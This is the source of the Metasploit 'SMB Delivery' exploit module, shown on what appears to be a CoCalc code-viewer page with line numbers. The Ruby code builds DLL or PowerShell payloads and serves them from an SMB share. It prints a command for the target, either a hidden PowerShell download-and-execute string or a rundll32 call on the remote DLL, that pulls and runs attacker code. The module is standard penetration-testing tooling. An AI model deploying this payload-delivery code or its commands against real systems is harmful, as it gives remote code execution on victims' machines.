CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::EXE
11
  include Msf::Exploit::Remote::SMB::Server::Share
12
  include Msf::Exploit::Powershell
13

14
  def initialize(info={})
15
    super(update_info(info,
16
      'Name'           => "SMB Delivery",
17
      'Description'    => %q{
18
        This module serves payloads via an SMB server and provides commands to retrieve
19
        and execute the generated payloads. Currently supports DLLs and Powershell.
20
      },
21
      'License'        => MSF_LICENSE,
22
      'Author'         =>
23
        [
24
          'Andrew Smith',
25
          'Russel Van Tuyl'
26
        ],
27
      'References'     =>
28
        [
29
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
30
        ],
31
      'Payload'        =>
32
        {
33
          'Space'       => 2048,
34
          'DisableNops' => true
35
        },
36
        'Platform'       => 'win',
37
        'Targets'        =>
38
          [
39
            ['DLL', {
40
              'Platform' => 'win',
41
              'Arch' => [ARCH_X86, ARCH_X64]
42
            }],
43
            ['PSH', {
44
              'Platform' => 'win',
45
              'Arch' => [ARCH_X86, ARCH_X64]
46
            }]
47
          ],
48
        'Privileged'     => false,
49
        'DisclosureDate' => '2016-07-26',
50
        'DefaultTarget'  => 0))
51

52
    register_options(
53
      [
54
        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])
55
      ])
56
  end
57

58
  def primer
59
    print_status('Run the following command on the target machine:')
60
    case target.name
61
    when 'PSH'
62
      self.file_contents = cmd_psh_payload(  payload.encoded,
63
                                             payload_instance.arch.first,
64
                                             remove_comspec: true,
65
                                             wrap_double_quotes: true)
66

67
      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
68
      download_and_run = "#{ignore_cert}#{download_string}"
69
      print_line generate_psh_command_line(  noprofile: true,
70
                                             windowstyle: 'hidden',
71
                                             command: download_and_run)
72
    when 'DLL'
73
      self.file_contents = generate_payload_dll
74
      print_line("rundll32.exe #{unc},0")
75
    end
76
  end
77
end
78

79